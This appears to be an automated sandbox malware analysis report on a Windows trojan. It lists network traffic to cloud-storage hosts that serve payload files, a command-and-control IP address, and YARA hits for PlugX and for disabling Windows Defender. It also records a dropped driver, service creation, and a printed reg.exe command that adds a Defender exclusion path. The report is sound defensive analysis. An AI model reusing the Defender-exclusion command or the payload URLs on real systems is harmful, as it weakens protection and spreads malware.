Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.47.169
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: jylhok.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: jylhok.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: cvqthu.net

Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: vhZp0W.exe, vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: vhZp0W.exe, 00000027.00000002.3528421015.00000000054E0000.00000004.00000020.00020000.00000000.sdmp, vhZp0W.exe, 00000027.00000002.3528906375.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: lOXFJk.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp, lOXFJk.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/&
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1002
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.00000000005AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1002
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.000000000059D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/;
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110077086.000000000059D000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2129040610.000000000059D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/Q
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifcocp
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifo
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifzodp
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifg
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifq
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifx
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2128957224.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2086270095.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2110020216.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.datdoZp
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49835 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.lOXFJk.exe.2770000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 39.2.vhZp0W.exe.3a50000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: vhZp0W.exe PID: 4336, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140006C95 NtAllocateVirtualMemory,

4_2_0000000140006C95

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

4_2_0000000140001520

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_000000014000C3F0	4_2_000000014000C3F0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_000000014000CC00	4_2_000000014000CC00
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140001A30	4_2_0000000140001A30
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_000000014000C2A0	4_2_000000014000C2A0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400022C0	4_2_00000001400022C0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400110F0	4_2_00000001400110F0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140010CF0	4_2_0000000140010CF0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140009300	4_2_0000000140009300
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_000000014000BB70	4_2_000000014000BB70
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_0000000140003F80	4_2_0000000140003F80
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00000001400103D0	4_2_00000001400103D0
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00007FFE1A520248	4_2_00007FFE1A520248
Source: C:\Users\user\Documents\lOXFJk.exe	Code function: 4_2_00007FFE1A51A1B8	4_2_00007FFE1A51A1B8
Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Code function: 43_2_00954AE2	43_2_00954AE2

Source: Joe Sandbox View

Dropped File: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2165224733.00000000048B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2128903487.00000000048D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 4.2.lOXFJk.exe.2770000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 39.2.vhZp0W.exe.3a50000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: vhZp0W.exe PID: 4336, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@66/29@15/3

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

4_2_0000000140003F80

Source: C:\Users\user\Documents\lOXFJk.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

4_2_0000000140001430

Source: C:\Users\user\Documents\lOXFJk.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\lOXFJk.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\lOXFJk.exe

File created: C:\Program Files (x86)\vhZp0W

Jump to behavior

Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2484:120:WilError_03
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5020:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3196:120:WilError_03
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.217.47.169:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_581804
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1312:120:WilError_03
Source: C:\Users\user\Documents\lOXFJk.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\vhZp0W\vhZp0W.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7384:120:WilError_03

Source: C:\Program Files (x86)\b3aEb0H\1y6U0V.exe	Command line argument: tbcore3.dll	43_2_00951000
